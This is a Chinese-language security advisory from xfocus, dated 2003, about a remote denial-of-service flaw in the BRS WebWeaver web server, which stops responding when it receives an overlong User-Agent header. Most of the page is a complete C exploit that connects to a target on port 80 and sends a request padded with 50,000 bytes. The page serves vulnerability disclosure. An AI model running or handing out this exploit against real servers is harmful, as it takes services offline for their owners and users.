xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

BRS WebWeaver httpd `User-Agent`远程拒绝服务漏洞


发布时间:2003-11-04
更新时间:2003-11-04
严重程度:
威胁程度:远程拒绝服务
错误类型:边界检查错误
利用方式:服务器模式

BUGTRAQ ID:8947

受影响系统
BRS WebWeaver 62 beta
BRS WebWeaver 0.49 beta
BRS WebWeaver 0.50 beta
BRS WebWeaver 0.51 beta
BRS WebWeaver 0.52 beta
BRS WebWeaver 0.60 beta
BRS WebWeaver 0.61 beta
BRS WebWeaver 0.62 beta
BRS WebWeaver 0.63 beta
BRS WebWeaver 1.0 6
BRS WebWeaver 1.0 5
BRS WebWeaver 1.0 4
BRS WebWeaver 1.0 3
BRS WebWeaver 1.0 2
BRS WebWeaver 1.0 1
详细描述
BRS WebWeaver是支持CGI,ISAPI,SSI和基于IP地址安全的WEB服务程序。

当BRS WebWeaver接收到包含超长字符串的`User-Agent`字段时,可导致服务程序停止响应。

测试代码
/*
*  BRS WebWeaver v.1.06 remote DoS exploit
*
* -d4rkgr3y [d4rk securitylab ru]
*
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>

#define port 80

main(int argc, char **argv) {
    struct hostent *hs;
    struct sockaddr_in sock;
    int sockfd, i;
    const c = 50000;
    char request[50150] =
        "GET /m00-r0cz HTTP/1.0\n"
        "Accept: */*\n"
        "Accept-Language: jp\n"
        "Accept-Encoding: gzip, deflate\n"
        "Host: m00security.org\n"
        "User-Agent: ";
    printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");

    if (argc!=2){
        printf("usage\n %s hostname\n\n",argv[0]);
        exit(1);
    }

    //memset((request+98),0x41,c);
    memset((request+strlen(request)),0x41,c);
    /* l33t ;] */
    request[strlen(request)] = 0x0a;
    request[strlen(request)] = 0x43;
    request[strlen(request)] = 0x6f;
    request[strlen(request)] = 0x6e;
    request[strlen(request)] = 0x6e;
    request[strlen(request)] = 0x65;
    request[strlen(request)] = 0x63;
    request[strlen(request)] = 0x74;
    request[strlen(request)] = 0x69;
    request[strlen(request)] = 0x6f;
    request[strlen(request)] = 0x6e;
    request[strlen(request)] = 0x3a;
    request[strlen(request)] = 0x20;
    request[strlen(request)] = 0x4b;
    request[strlen(request)] = 0x65;
    request[strlen(request)] = 0x65;
    request[strlen(request)] = 0x70;
    request[strlen(request)] = 0x2d;
    request[strlen(request)] = 0x41;
    request[strlen(request)] = 0x6c;
    request[strlen(request)] = 0x69;
    request[strlen(request)] = 0x76;
    request[strlen(request)] = 0x65;
    request[strlen(request)] = 0x0a;
    request[strlen(request)] = 0x0a;

    bzero(&sock, sizeof(sock));
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
    if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
        if ((hs=gethostbyname(argv[1]))==NULL) {
            printf("damn");
            exit(1);
        }
        printf("~ Host resolved.\n");
        sock.sin_family = hs->h_addrtype;
        memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
        perror("damn");  exit(0);
    }

    if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
        perror("damn"); exit(0);
    }
    printf("~ Socket connected\n");
    printf("~ Sending evil code... ");
    write(sockfd,request,strlen(request));
    printf("done\n\n");
    close(sockfd);
}
/* m00 */

相关信息
d4rkgr3y <d4rk@securitylab.ru>.
参考:http://www.securityfocus.com/archive/1/343111